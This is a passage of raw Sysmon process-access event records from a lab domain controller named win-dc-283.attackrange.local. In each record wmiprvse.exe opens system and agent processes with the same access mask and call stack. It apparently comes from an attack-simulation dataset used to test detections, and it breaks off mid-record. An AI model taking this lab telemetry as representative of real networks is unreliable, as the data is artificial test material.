15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025476Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025475Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025474Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025473Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025472Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025471Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025470Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025469Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025468Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025467Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025466Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025465Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025464Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025463Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025462Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025461Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025460Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025459Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025458Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025457Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program 